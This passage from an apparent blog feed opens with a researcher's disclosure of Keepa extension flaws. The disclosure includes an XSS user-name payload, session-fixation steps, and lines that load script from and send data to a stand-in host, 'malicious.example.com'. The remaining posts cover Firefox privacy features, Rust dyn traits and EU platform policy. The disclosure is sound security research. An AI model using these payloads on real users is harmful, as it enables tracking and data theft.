    https://completion.amazon.ca https://completion.amazon.cn
    https://completion.amazon.it https://completion.amazon.es
    https://completion.amazon.in https://completion.amazon.nl
    https://completion.amazon.com.mx https://completion.amazon.com.au
    https://completion.amazon.com.br;

That’s lots of different websites, some of which might allow circumventing the protection. But the 'unsafe-inline' keyword makes complicated approaches unnecessary: inline scripts are allowed, so the simple attack above already works.

Deploying session fixation

You probably noticed that the attack described above relies on you choosing a malicious user name and logging into that account. So far this is merely so-called Self-XSS: the only person you can attack is yourself. Usually this isn’t considered an exploitable vulnerability.

This changes however if you can automatically log other people into your account. Then you can create a malicious account in advance, after which you make sure your target is logged into it. Typically, this is done via a session fixation attack.

On the Keepa website, the session is determined by a 64 byte alphanumeric token. In the JavaScript code, this token is exposed as storage.token. And the login procedure involves redirecting the user to an address like https://keepa.com/#!r/4ieloesi0duftpa385nhql1hjlo4dcof86aecsr7r8est7288p9ge2m05fvbnoih which will store 4ieloesi0duftpa385nhql1hjlo4dcof86aecsr7r8est7288p9ge2m05fvbnoih as the current session token.

So the complete attack would look like this:

  • Register an account with a malicious user name like me<img src=x onerror=alert(1)>
  • Check the value of storage.token to extract the session token
  • If a Keepa user visits your website, make sure to open https://keepa.com/#!r/<token> in a pop-up window (can be closed immediately afterwards)

Your JavaScript code (here alert(1)) will be injected into each and every Keepa Box of this user now. As the Keepa session is persistent, it will survive browser restarts. And it will even run on the main Keepa website if the user logs out, giving you a chance to prevent them from breaking out of the session fixation.

Keepa addressed this vulnerability by forbidding angled brackets in user names. The application still contains plenty of potentially exploitable HTML injection points, Content Security Policy hasn’t been changed either. The session fixation attack is also still possible.

The impact

The most obvious consequence of this vulnerability: the malicious code can track all Amazon products that the user looks at. And then it can send messages that the Keepa extension will react to. These are mostly unspectacular except for two:

  • ping: retrieves the full address of the Amazon page, providing additional information beyond the mere article ID
  • openPage: opens a Private Browsing / Incognito window with a given page address (seems to be unused by Keepa Box code but can be abused by malicious code nevertheless)

So the main danger here is that some third party will be able to spy on the users whenever they go to Amazon. But for that it needs to inject considerable amounts of code, and it needs to be able to send data back. With user names being at most 100 characters long, and with Keepa using a fairly restrictive Content Security Policy: is it even possible?

Usually, the approach would be to download additional JavaScript code from the attacker’s web server. However, Keepa’s Content Security Policy mentioned above only allows external scripts from a few domains. Any additional scripts still have to be inserted as inline scripts.

Most other Content Security Policy directives are similarly restrictive and don’t allow connections to arbitrary web servers. The only notable exception is worker-src:

worker-src 'self' blob: data: *;

No restrictions here for some reason, so the malicious user name could be something like:

<img
  src=x
  onerror="new Worker('//malicious.example.com').onmessage=e=>document.write(e.data)">

This will create a Web Worker with the script downloaded from malicious.example.com. Same-origin policy won’t prevent it from running if the right CORS headers are set. And then it will wait for HTML code to be sent by the worker script. The HTML code will be added to the document via document.write() and can execute further JavaScript code, this time without any length limits.

The same loophole in the Content Security Policy can be used to send exfiltrated data to an external server: new Worker("//malicious.example.com?" + encodeURIComponent(data)) will be able to send data out.

Data exposure vulnerability

My previous article on Keepa already looked into Keepa’s scraping functionality, in particular how Keepa loads Amazon pages in background to extract data from them. When a page loads, Keepa tells its content script which scraping filters to use. This isn’t done via inherently secure extension communication APIs but rather via window.postMessage(). The handling in the content script essentially looks as follows:

window.addEventListener("message", function (event) {
  if (event.source == window.parent && event.data) {
    var instructions = event.data.value;
    if ("data" == event.data.key && instructions.url == document.location) {
      scrape(instructions, function (scrapeResult) {
        window.parent.postMessage({ sandbox: scrapeResult }, "*");
      });
    }
  }
}, false);

This will accept scraping instructions from the parent frame, regardless of whether the parent frame belongs to the extension or not. The content script will perform the scraping, potentially extracting security tokens or private information, and send the results back to its parent frame.

A malicious website could abuse this by loading a third-party page in a frame, then triggering the scraping functionality to extract arbitrary data from it, something that same-origin policy normally prevents. The catch: the content script is only active on Amazon properties and Keepa’s own website. And luckily most Amazon pages with sensitive data don’t allow framing by third parties.

Keepa’s website on the other hand is lacking such security precautions. So my proof-of-concept page would extract data from the Keepa forum if you were logged into it: your user name, email address, number of messages and whether you are a privileged user. Extracting private messages or any private data available to admins would have been easy as well. All that without any user interaction and without any user-visible effects.

This vulnerability has been addressed in Keepa 3.88 by checking the message origin. Only messages originating from an extension page are accepted now, messages from websites will be ignored.
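
A minimal version of such an origin check (illustrative only, not Keepa's actual code) could look like this:

// Illustrative sketch of checking the message origin in the content script.
const EXTENSION_ORIGIN = new URL(browser.runtime.getURL("")).origin;

window.addEventListener("message", function (event) {
  // Only accept scraping instructions from the extension's own pages.
  if (event.origin !== EXTENSION_ORIGIN) {
    return;
  }
  // ... handle the scraping instructions as before ...
}, false);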

Conclusions

Keepa’s reliance on jQuery makes it susceptible to XSS vulnerabilities, with the one described above being only one out of many potential vulnerabilities. While the website itself probably isn’t a worthwhile target, persistent XSS vulnerabilities in Keepa Box expose users to tracking by arbitrary websites. This tracking is limited to shopping on Amazon websites but will expose much potentially private information for the typical Keepa user.

Unlike most websites, Keepa deployed a Content Security Policy that isn’t useless. By closing the remaining loopholes, attacks like the one presented here could be made impossible or at least considerably more difficult. To date, the vulnerability has been addressed minimally however and the holes in the Content Security Policy remain.

Keepa exposing its scraping functionality to arbitrary websites could have had severe impact. With any website being able to extract security tokens this way, impersonating the user towards Amazon would have been possible. Luckily, security measures on Amazon’s side prevented this scenario. Nevertheless, this vulnerability was very concerning. The fact that the extension still doesn’t use inherently secure communication channels for this functionality doesn’t make it better.

Timeline

  • 2021-07-07: Reported the vulnerabilities to the vendor via email (no response and no further communication)
  • 2021-09-15: Keepa 3.88 released, fixing data exposure vulnerability
  • 2021-10-04: Published article (90 days deadline)

Mozilla Security BlogFirefox 93 features an improved SmartBlock and new Referrer Tracking Protections

We are happy to announce that the Firefox 93 release brings two exciting privacy improvements for users of Strict Tracking Protection and Private Browsing. With a more comprehensive SmartBlock 3.0, we combine a great browsing experience with strong tracker blocking. In addition, our new and enhanced referrer tracking protection prevents sites from colluding to share sensitive user data via HTTP referrers.

SmartBlock 3.0

In Private Browsing and Strict Tracking Protection, Firefox goes to great lengths to protect your web browsing activity from trackers. As part of this, the built-in content blocking will automatically block third-party scripts, images, and other content from being loaded from cross-site tracking companies reported by Disconnect. This type of aggressive blocking could sometimes bring small inconveniences, such as missing images or bad performance. In some rare cases, it could even result in a feature malfunction or an empty page.

To compensate, we developed SmartBlock, a mechanism that will intelligently load local, privacy-preserving alternatives to the blocked resources that behave just enough like the original ones to make sure that the website works properly.

The third iteration of SmartBlock brings vastly improved support for replacing the popular Google Analytics scripts and added support for popular services such as Optimizely, Criteo, Amazon TAM and various Google advertising scripts.

As usual, these replacements are bundled with Firefox and cannot track you in any way.

HTTP Referrer Protections

The HTTP Referer [sic] header is a browser signal that reveals to a website which location “referred” the user to that website’s server. It is included in navigations and sub-resource requests a browser makes and is frequently used by websites for analytics, logging, and cache optimization. When sent as part of a top-level navigation, it allows a website to learn which other website the user was visiting before.

This is where things get problematic. If the browser sends the full URL of the previous site, then it may reveal sensitive user data included in the URL. Some sites may want to avoid being mentioned in a referrer header at all.

The Referrer Policy was introduced to address this issue: it allows websites to control the value of the referrer header so that a stronger privacy setting can be established for users. In Firefox 87, we went one step further and decided to set the new default referrer policy to strict-origin-when-cross-origin which will automatically trim the most sensitive parts of the referrer URL when it is shared with another website. As such, it prevents sites from unknowingly leaking private information to trackers.

However, websites can still override the introduced default trimming of the referrer, effectively deactivating this protection and sending the full URL anyway. This invites websites to collude with trackers by choosing a more permissive referrer policy, and as such it remained a major privacy issue.

With the release of version 93, Firefox will ignore less restrictive referrer policies for cross-site requests, such as ‘no-referrer-when-downgrade’, ‘origin-when-cross-origin’, and ‘unsafe-url’ and hence renders such privacy violations ineffective. In other words, Firefox will always trim the HTTP referrer for cross-site requests, regardless of the website’s settings.
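
As a hypothetical illustration (the URL below is a placeholder), a page that requests a permissive policy for a cross-site request via the Fetch API no longer gets its way:

// Hypothetical illustration; the URL is a placeholder.
// The page asks for the full referrer URL to be sent with a cross-site request...
fetch("https://analytics.example/collect", { referrerPolicy: "unsafe-url" });
// ...but from Firefox 93 on, the Referer header of this cross-site request is
// still trimmed to the origin of the current page, e.g. "https://www.example.com/".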

For same-site requests, websites can of course still send the full referrer URL.

Enabling these new Privacy Protections

As a Firefox user who is using Strict Tracking Protection and Private Browsing, you can benefit from the additionally provided privacy protection mechanism as soon as your Firefox auto-updates to Firefox 93. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 93 features an improved SmartBlock and new Referrer Tracking Protections appeared first on Mozilla Security Blog.

Mozilla Security BlogFirefox 93 protects against Insecure Downloads

 

Downloading files to your device still poses a major security risk and can ultimately lead to an entire system compromise by an attacker, especially because the security risks are not always apparent. To better protect you from the dangers of insecure, or even undesired, downloads, we integrated the following two security enhancements which will increase security when you download files on your computer. In detail, Firefox will:

  • block insecure HTTP downloads on a secure HTTPS page, and
  • block downloads in sandboxed iframes, unless the iframe is explicitly annotated with the allow-downloads attribute.

 

Blocking Downloads relying on insecure connections

Downloading files via an insecure HTTP connection generally poses a major security risk because data transferred by the regular HTTP protocol is unprotected and transferred in clear text, such that attackers are able to view, steal, or even tamper with the transmitted data. Put differently, downloading a file over an insecure connection allows an attacker to replace the file with malicious content which, when opened, can ultimately lead to an entire system compromise.

 

Firefox 93 prompting the end user about a ‘Potential security risk’ when downloading a file using an insecure connection.

 

As illustrated in the figure above, if Firefox detects such an insecure download, it will initially block the download and prompt you, signalling the potential security risk. This prompt allows you either to stop the download and Remove the file, or to override the decision and download the file anyway, though it’s safer to abandon the download at this point.

 

Blocking Downloads in sandboxed iframes

The Inline Frame sandbox attribute is the preferred way to lock down the capabilities of embedded third-party content. Currently, even with the sandbox attribute set, malicious content could initiate a drive-by download, prompting the user to download malicious files. Unless the sandboxed content is explicitly annotated with the ‘allow-downloads’ attribute, Firefox will protect you against such drive-by downloads. Put differently, downloads initiated from sandboxed contexts without this attribute will be canceled silently in the background, without disrupting the user’s browsing.
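
For embedders that genuinely need downloads from sandboxed content, the opt-in looks roughly like this (the embedded URL is a placeholder):

// Hypothetical example; the embedded URL is a placeholder.
var frame = document.createElement("iframe");
frame.src = "https://third-party.example/widget.html";
// Without the "allow-downloads" token, Firefox 93 silently cancels any download
// that the sandboxed content tries to start.
frame.setAttribute("sandbox", "allow-scripts allow-downloads");
document.body.appendChild(frame);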

 

It’s Automatic!

As a Firefox user, you can benefit from the additionally provided security mechanism as soon as your Firefox auto-updates to version 93. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 93 protects against Insecure Downloads appeared first on Mozilla Security Blog.

Mozilla Security BlogSecuring Connections: Disabling 3DES in Firefox 93

As part of our continuing work to ensure that Firefox provides secure and private network connections, it periodically becomes necessary to disable configurations or even entire protocols that were once thought to be secure, but no longer provide adequate protection. For example, last year, early versions of the Transport Layer Security (TLS) protocol were disabled by default.

One of the options that goes into configuring TLS is the choice of which encryption algorithms to enable. That is, which methods are available to use to encrypt and decrypt data when communicating with a web server?

Goodbye, 3DES

3DES (“triple DES”, an adaptation of DES (“Data Encryption Standard”)) was for many years a popular encryption algorithm. However, as attacks against it have become stronger, and as other more secure and efficient encryption algorithms have been standardized and are now widely supported, it has fallen out of use. Recent measurements indicate that Firefox encounters servers that choose to use 3DES about as often as servers that use deprecated versions of TLS.

As long as 3DES remains an option that Firefox provides, it poses a security and privacy risk. Because it is no longer necessary or prudent to use this encryption algorithm, it is disabled by default in Firefox 93.

Addressing Compatibility

As with disabling obsolete versions of TLS, deprecating 3DES may cause compatibility issues. We hypothesize that the remaining uses of 3DES correspond mostly to outdated devices that use old cryptography and cannot be upgraded. It may also be that some modern servers inexplicably (perhaps unintentionally) use 3DES when other more secure and efficient encryption algorithms are available. Disabling 3DES by default helps with the latter case, as it forces those servers to choose better algorithms. To account for the former situation, Firefox will allow 3DES to be used when deprecated versions of TLS have manually been enabled. This will protect connections by default by forbidding 3DES when it is unnecessary while allowing it to be used with obsolete servers if necessary.

The post Securing Connections: Disabling 3DES in Firefox 93 appeared first on Mozilla Security Blog.

The Mozilla BlogDo you need a VPN at home? Here are 5 reasons you might.

You might have heard of VPNs — virtual private networks — at some point, and chalked them up to something only “super techy” people or hackers would ever use. At this point in the evolution of online life, however, VPNs have become more mainstream, and anyone may have good reasons to use one. VPNs are beneficial for added privacy when you’re connected to a public wifi network, and you might also want to use a VPN at home when you’re online as well. Here are five reasons to consider using a VPN at home.

Stop your ISP from watching you 

Did you know that when you connect to the internet at home through your internet service provider (ISP), it can track what you do online? Even though your traffic is usually encrypted using HTTPS, this doesn’t conceal which sites you are visiting. Your ISP can see every site you visit and track things like how often you visit sites and how long you’re on them. That’s rich personal — and private — information you’re giving away to your ISP every time you connect to the internet at home. The good news is that a VPN at home can prevent your ISP from snooping on you by encrypting your traffic before the ISP can see it.

How do VPNs work?

Get answers to nine common questions about VPNs

Secure yourself on a shared building network

Some apartment buildings offer wifi as an incentive to residents, but just like your ISP, anyone else on the network can see what sites you are visiting. Do you even know all your neighbors, let alone know if they’re bumbling true crime podcast fanatics or even actual cyber criminals? Do you know for sure that your landlord or building manager isn’t tracking your internet traffic? If you’re concerned about any of that, a VPN can add extra privacy on your shared network by encrypting your traffic between you and your VPN provider so that no one on your local network can decipher or modify it.

Block nosy housemates

Similar to a shared apartment network, sharing an internet connection could leave your browsing behavior vulnerable to snooping by housemates or any other untrustworthy person who accesses your network. A VPN at home adds an extra layer of encryption, preventing people on your network from seeing what websites you go to.

Increase remote work security

Working remotely, at least part of the time, is the new normal for millions of office workers, and some people are experiencing a VPN for the first time. Some employers offer an enterprise VPN for home workers, and some even require logging into one to access a company file server.

Explore the world at home

There are some fun reasons to use a VPN at home, too. You can get access to shows, websites and livestreams in dozens of different countries. See what online shopping is like in a different locale and get the feeling of gaming from somewhere new.

The post Do you need a VPN at home? Here are 5 reasons you might. appeared first on The Mozilla Blog.

Cameron KaiserTenFourFox FPR32 SPR5 available (the last official build)

TenFourFox Feature Parity Release 32 Security Parity Release 5 "32.5" is available for testing (downloads, hashes). Aside from the announced change with .inetloc and .webloc handling, this release also updates the ATSUI font blacklist and includes the usual security updates. It will go live Monday evening Pacific as usual assuming no issues.

As stated previously, this is the last official build before TenFourFox goes into hobby mode; version checking is therefore disabled in this release since there will be no new official build to check for. I know I keep teasing a future consolidated post about how users who want to continue using it can get or make their own builds, but I want to update the docs and FAQ first, plus actually give you something new to test your build out (in this case it's going to be switching the certificate and security base over to Firefox 91ESR from 78ESR). There are already some options apart from the official method and we'll discuss those, but if you yourself are gearing up to offer public builds or toolkits, feel free to make this known in the comments. Work is a little hairy this month but I want to get to this in the next couple weeks.

Cameron Kaisercurl, Let's Encrypt and Apple laziness

The built-in version of curl on any Power Mac version of OS X will not be capable of TLS 1.1 or higher, so most of you who need it will have already upgraded to an equivalent with MacPorts. However, even for later Intel Macs that are ostensibly supported -- including my now legacy MacBook Air with Mojave I keep around for running 32-bit Intel -- the expiration of one of Let's Encrypt's root certificates yesterday means curl may suddenly cease connecting to TLS sites with Let's Encrypt certificates. Yesterday I was trying to connect to one of my own Floodgap sites, unexpectedly got certificate errors I wasn't seeing in TenFourFox or mainline Firefox, and, after a moment of panic, suddenly realized what had happened. While you can use -k to ignore the error, that basically defeats the entire idea of having a certificate to start with.

The real hell of it is that Mojave 10.14 is still technically supported by Apple, and you would think updating the curl root certificate store would be an intrinsic part of security updates, but you'd be wrong. The issue with old roots even affects Safari on some Monterey betas, making the best explanation more Apple laziness than benign neglect. Firefox added this root ages ago and so did TenFourFox.

If you are using MacPorts curl, which is (IMHO) the best solution on Power Macs due to Ken's diligence but is still a dandy alternative to Homebrew on Intel Macs, the easiest solution is to ensure curl-ca-bundle is up-to-date. Homebrew (and I presume Tigerbrew, for 10.4) can do brew install curl-ca-bundle, assuming your installation is current.

However, I use the built-in curl on the Mojave MacBook Air. Ordinarily I would just do an in-place update of the root certificate bundle, as I did on my 10.4 G5 before I started using a self-built curl, but thanks to System Integrity Protection you're not allowed to do that anymore even as root. Happily, the cURL maintainers themselves have a downloadable root certificate store which is periodically refreshed. Download that, put it somewhere in your home directory, and in your .login or .profile or whatever, set CURL_CA_BUNDLE to its location (on my system, I have a ~/bin directory, so I put it there and set it to /Users/yourname/bin/cacert.pem).

The Mozilla BlogMiracle Whip, Finstas, #InternationalPodcastDay, and #FreeBritney all made the Top Shelf this week

At Mozilla, we believe part of making the internet we want is celebrating the best of the internet, and that can be as simple as sharing a tweet that made us pause in our feed. Twitter isn’t perfect, but there are individual tweets that come pretty close.

Each week in Top Shelf, we will be sharing the tweets that made us laugh, think, Pocket them for later, text our friends, and want to continue the internet revolution.

Here’s what made it to the Top Shelf for the week of September 27, 2021, in no particular order.

From Licorice Pizza to McRibs to #NationalCoffeeDay, food-related topics boiled to the top of the trends this week on Twitter, though not every one of them is actually food… we’ll leave you to decide which!


The Pocket Joy List Project

The stories, podcasts, poems and songs we always come back to

The post Miracle Whip, Finstas, #InternationalPodcastDay, and #FreeBritney all made the Top Shelf this week appeared first on The Mozilla Blog.

The Mozilla BlogAnalysis of Google’s Privacy Budget Proposal

Fingerprinting is a major threat to user privacy on the Web. Fingerprinting uses existing properties of your browser like screen size, installed add-ons, etc. to create a unique or semi-unique identifier which it can use to track you around the Web. Even if individual values are not particularly unique, the combination of values can be unique (e.g., how many people are running Firefox Nightly, live in North Dakota, have an M1 Mac and a big monitor, etc.)

This post discusses a proposal by Google to address fingerprinting called the Privacy Budget. The idea behind the Privacy Budget is to estimate the amount of information revealed by each piece of fingerprinting information (called a “fingerprinting surface”, e.g., screen resolution) and then limit the total amount of that information a site can obtain about you. Once the site reaches that limit (the “budget”), further attempts to learn more about you would fail, perhaps by reporting an error or returning a generic value. This idea has been getting a fair amount of attention and has been proposed as a potential privacy mitigation in some in-development W3C specifications.

While this seems like an attractive idea, our detailed analysis of the proposal raises questions about its feasibility.  We see a number of issues:

  • Estimating the amount of information revealed by a single surface is quite difficult. Moreover, because some values will be much more common than others, any total estimate is misleading. For instance, the Chrome browser has many users and so learning someone uses Chrome is not very identifying; by contrast, learning that someone uses Firefox Nightly is quite identifying because there are few Nightly users. (A rough sketch of this estimation problem follows after this list.)
  • Even if we are able to set a common value for the budget, it is unclear how to determine whether a given set of queries exceeds that value. The problem is that these queries are not independent and so you can’t just add up each query. For instance, screen width and screen height are highly correlated and so once a site has queried one, learning the other is not very informative.
  • Enforcement is likely to lead to surprising and disruptive site breakage because sites will exceed the budget and then be unable to make API calls which are essential to site function. This will be exacerbated because the order in which the budget is used is nondeterministic and depends on factors such as the network performance of various sites, so some users will experience breakage and others will not.
  • It is possible that the privacy budget mechanism itself can be used for tracking by exhausting the budget with a particular pattern of queries and then testing to see which queries still work (because they already succeeded).
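
As a rough sketch of the estimation problem mentioned in the first point above (the probabilities are made-up numbers, not real market-share data):

// Rough sketch; the probabilities below are made up for illustration.
// The "surprisal" of observing a value is -log2(probability): common values
// reveal little about a user, rare values reveal a lot.
function bitsRevealed(probability) {
  return -Math.log2(probability);
}

bitsRevealed(0.65);   // ~0.6 bits for a very common browser
bitsRevealed(0.0001); // ~13.3 bits for a rare choice like Firefox Nightly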

While we understand the appeal of a global solution to fingerprinting — and no doubt this is the motivation for the Privacy Budget idea appearing in specifications — the underlying problem here is the large amount of fingerprinting-capable surface that is exposed to the Web. There does not appear to be a shortcut around addressing that. We believe the best approach is to minimize the easy-to-access fingerprinting surface by limiting the amount of information exposed by new APIs and gradually reducing the amount of information exposed by existing APIs. At the same time, browsers can and should attempt to detect abusive patterns by sites and block those sites, as Firefox already does.

This post is part of a series of posts analyzing privacy-preserving advertising proposals.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Privacy analysis of FLoC

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

The post Analysis of Google’s Privacy Budget Proposal appeared first on The Mozilla Blog.

Niko MatsakisDyn async traits, part 2

In the previous post, we uncovered a key challenge for dyn and async traits: the fact that, in Rust today, dyn types have to specify the values for all associated types. This post is going to dive into more background about how dyn traits work today, and in particular it will talk about where that limitation comes from.

Today: Dyn traits implement the trait

In Rust today, assuming you have a “dyn-safe” trait DoTheThing, then the type dyn DoTheThing implements DoTheThing. Consider this trait:

trait DoTheThing {
	fn do_the_thing(&self);
}

impl DoTheThing for String {
    fn do_the_thing(&self) {
        println!("{}", self);
    }
}

And now imagine some generic function that uses the trait:

fn some_generic_fn<T: ?Sized + DoTheThing>(t: &T) {
	t.do_the_thing();
}

Naturally, we can call some_generic_fn with a &String, but — because dyn DoTheThing implements DoTheThing — we can also call some_generic_fn with a &dyn DoTheThing:

fn some_nongeneric_fn(x: &dyn DoTheThing) {
    some_generic_fn(x)
}

Dyn safety, a mini retrospective

Early on in Rust, we debated whether dyn DoTheThing ought to implement the trait DoTheThing or not. This was, indeed, the origin of the term “dyn safe” (then called “object safe”). At the time, I argued in favor of the current approach: that is, creating a binary property. Either the trait was dyn safe, in which case dyn DoTheThing implements DoTheThing, or it was not, in which case dyn DoTheThing is not a legal type. I am no longer sure that was the right call.

What I liked at the time was the idea that, in this model, whenever you see a type like dyn DoTheThing, you know that you can use it like any other type that implements DoTheThing.

Unfortunately, in practice, the type dyn DoTheThing is not comparable to a type like String. Notably, dyn types are not sized, so you can’t pass them around by value or work with them like strings. You must instead always pass around some kind of pointer to them, such as a Box<dyn DoTheThing> or a &dyn DoTheThing. This is “unusual” enough that we make you opt-in to it for generic functions, by writing T: ?Sized.

What this means is that, in practice, generic functions don’t accept dyn types “automatically”, you have to design for dyn explicitly. So a lot of the benefit I envisioned didn’t come to pass.

Static versus dynamic dispatch, vtables

Let’s talk for a bit about dyn safety and where it comes from. To start, we need to explain the difference between static dispatch and virtual (dyn) dispatch. Simply put, static dispatch means that the compiler knows which function is being called, whereas dyn dispatch means that the compiler doesn’t know. In terms of the CPU itself, there isn’t much difference. With static dispatch, there is a “hard-coded” instruction that says “call the code at this address”; with dynamic dispatch, there is an instruction that says “call the code whose address is in this variable”. The latter can be a bit slower but it hardly matters in practice, particularly with a successful prediction.

When you use a dyn trait, what you actually have is a vtable. You can think of a vtable as being a kind of struct that contains a collection of function pointers, one for each method in the trait. So the vtable type for the DoTheThing trait might look like (in practice, there is a bit of extra data, but this is close enough for our purposes):

struct DoTheThingVtable {
    do_the_thing: fn(*mut ())
}

Here the do_the_thing method has a corresponding field. Note that the type of the first argument ought to be &self, but we changed it to *mut (). This is because the whole idea of the vtable is that you don’t know what the self type is, so we just changed it to “some pointer” (which is all we need to know).

When you create a vtable, you are making an instance of this struct that is tailored to some particular type. In our example, the type String implements DoTheThing, so we might create the vtable for String like so:

static Vtable_DoTheThing_String: &DoTheThingVtable = &DoTheThingVtable {
    do_the_thing: <String as DoTheThing>::do_the_thing as fn(*mut ())
    //            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    //            Fully qualified reference to `do_the_thing` for strings
};

You may have heard that a &dyn DoTheThing type in Rust is a wide pointer. What that means is that, at runtime, it is actually a pair of two pointers: a data pointer and a vtable pointer for the DoTheThing trait. So &dyn DoTheThing is roughly equivalent to:

(*mut (), &'static DoTheThingVtable)

When you cast a &String to a &dyn DoTheThing, what actually happens at runtime is that the compiler takes the &String pointer, casts it to *mut (), and pairs it with the appropriate vtable. So, if you have some code like this:

let x: &String = &"Hello, Rustaceans".to_string();
let y: &dyn DoTheThing = x;

It winds up “desugared” to something like this:

let x: &String = &"Hello, Rustaceans".to_string();
let y: (*mut (), &'static DoTheThingVtable) = 
    (x as *mut (), Vtable_DoTheThing_String);

The dyn impl

We’ve seen how you create wide pointers and how the compiler represents vtables. We’ve also seen that, in Rust, dyn DoTheThing implements DoTheThing. You might wonder how that works. Conceptually, the compiler generates an impl where each method in the trait is implemented by extracting the function pointer from the vtable and calling it:

impl DoTheThing for dyn DoTheThing {
    fn do_the_thing(self: &dyn DoTheThing) {
        // Remember that `&dyn DoTheThing` is equivalent to
        // a tuple like `(*mut (), &'static DoTheThingVtable)`:
        let (data_pointer, vtable_pointer) = self;

        let function_pointer = vtable_pointer.do_the_thing;
        function_pointer(data_pointer);
    }
}

In effect, when we call a generic function like some_generic_fn with T = dyn DoTheThing, we monomorphize that call exactly like any other type. The call to do_the_thing is dispatched against the impl above, and it is that special impl that actually does the dynamic dispatch. Neat.

Static dispatch permits monomorphization

Now that we’ve seen how and when vtables are constructed, we can talk about the rules for dyn safety and where they come from. One of the most basic rules is that a trait is only dyn-safe if it contains no generic methods (or, more precisely, if its methods are only generic over lifetimes, not types). The reason for this rule derives directly from how a vtable works: when you construct a vtable, you need to give a single function pointer for each method in the trait (or, perhaps, a finite set of function pointers). The problem with generic methods is that there is no single function pointer for them: you need a different pointer for each type that they’re applied to. Consider this example trait, PrintPrefixed:

trait PrintPrefixed {
    fn prefix(&self) -> String;
    fn apply<T: Display>(&self, t: T);
}

impl PrintPrefixed for String {
    fn prefix(&self) -> String {
        self.clone()
    }
    fn apply<T: Display>(&self, t: T) {
        println!("{}: {}", self, t);
    }
}

What would a vtable for String as PrintPrefixed look like? Generating a function pointer for prefix is no problem, we can just use <String as PrintPrefixed>::prefix. But what about apply? We would have to include a function pointer for <String as PrintPrefixed>::apply<T>, but we don’t know yet what the T is!

In contrast, with static dispatch, we don’t have to know what T is until the point of call. In that case, we can generate just the copy we need.

Partial dyn impls

The previous point shows that a trait can have some methods that are dyn-safe and some methods that are not. In current Rust, this makes the entire trait be “not dyn safe”, and this is because there is no way for us to write a complete impl PrintPrefixed for dyn PrintPrefixed:

impl PrintPrefixed for dyn PrintPrefixed {
    fn prefix(&self) -> String {
        // For `prefix`, no problem:
        let prefix_fn = /* get prefix function pointer from vtable */;
        prefix_fn();
    }
    fn apply<T: Display>(&self, t: T) {
        // For `apply`, we can’t handle all `T` types, what field to fetch?
        panic!("No way to implement apply")
    }
}

Under the alternative design that was considered long ago, we could say that a dyn PrintPrefixed value is always legal, but dyn PrintPrefixed only implements the PrintPrefixed trait if all of its methods (and other items) are dyn safe. Either way, if you had a &dyn PrintPrefixed, you could call prefix. You just wouldn’t be able to use a dyn PrintPrefixed with generic code like fn foo<T: ?Sized + PrintPrefixed>.

(We’ll return to this theme in future blog posts.)

If you’re familiar with the “special case” around trait methods that require where Self: Sized, you might be able to see where it comes from now. If a method has a where Self: Sized requirement, and we have an impl for a type like dyn PrintPrefixed, then we can see that this impl could never be called, and so we can omit the method from the impl (and vtable) altogether. This is awfully similar to saying that dyn PrintPrefixed is always legal, because it means that there is only a subset of methods that can be used via virtual dispatch. The difference is that dyn PrintPrefixed: PrintPrefixed still holds, because we know that generic code won’t be able to call those “non-dyn-safe” methods: generic code that could receive a dyn PrintPrefixed must declare T: ?Sized, and such code cannot call methods that require Self: Sized.

Associated types and dyn types

We began this saga by talking about associated types and dyn types. In Rust today, a dyn type is required to specify a value for each associated type in the trait. For example, consider a simplified Iterator trait:

trait Iterator {
    type Item;

    fn next(&mut self) -> Option<Self::Item>;
}

This trait is dyn safe, but if you actually have a dyn in practice, you would have to write something like dyn Iterator<Item = u32>. The impl Iterator for dyn Iterator looks like:

impl<T> Iterator for dyn Iterator<Item = T> {
    type Item = T;
    
    fn next(&mut self) -> Option<T> {
        let next_fn = /* get next function from vtable */;
        return next_fn(self);
    }
}

Now you can see why we require all the associated types to be part of the dyn type — it lets us write a complete impl (i.e., one that includes a value for each of the associated types).

Conclusion

We covered a lot of background in this post:

  • Static vs dynamic dispatch, vtables
  • The origin of dyn safety, and the possibility of “partial dyn safety”
  • The idea of a synthesized impl Trait for dyn Trait

Mozilla Open Policy & Advocacy BlogAddressing gender-based online harms in the DSA

Last year the European Commission published the Digital Services Act (DSA) proposal, a draft law that seeks to set a new standard for platform accountability. We welcomed the draft law when it was published, and since then we have been working to ensure it is strengthened and elaborated as it proceeds through the mark-up stage. Today we’re confirming our support for a new initiative that focuses on improving the DSA with respect to gender-based online harm, an objective that aligns with our policy vision and the Mozilla Manifesto addendum.

Our efforts to improve the DSA have focused above all on the draft law’s risk assessment and auditing provisions. In order to structurally improve the health of the internet ecosystem, we need laws that compel platforms to meaningfully assess and mitigate the systemic risks stemming from the design and operation of their services. While the draft DSA is a good start, it falls short when it comes to specifying the types of systemic risks that platforms need to address.

One such area of systemic risk that warrants urgent attention is gender-based online harm. Women and non-binary people are subject to massive and persistent abuse online, with 74% of women reporting experiencing some form of online violence in the EU in 2020. Women from marginalised communities, including LGBTQ+ people, women of colour, and Black women in particular, are often disproportionately targeted with online abuse.

In our own platform accountability research this untenable reality has surfaced time and time again. For instance, in one testimony submitted to Mozilla Foundation as part of our YouTube Regrets campaign, one person wrote “In coming out to myself and close friends as transgender, my biggest regret was turning to YouTube to hear the stories of other trans and queer people. Simply typing in the word “transgender” brought up countless videos that were essentially describing my struggle as a mental illness and as something that shouldn’t exist. YouTube reminded me why I hid in the closet for so many years.”

Another story read: “I was watching a video game series on YouTube when all of a sudden I started getting all of these anti-women, incel and men’s rights recommended videos. I ended up removing that series from my watch history and going through and flagging those bad recommendations as ‘not interested’. It was gross and disturbing. That stuff is hate, and I really shouldn’t have to tell YouTube that it’s wrong to promote it.”

Indeed, further Mozilla research into this issue on YouTube has underscored the role of automated content recommender systems in exacerbating the problem, to the extent that they can recommend videos that violate the platform’s very own policies, like hate speech.

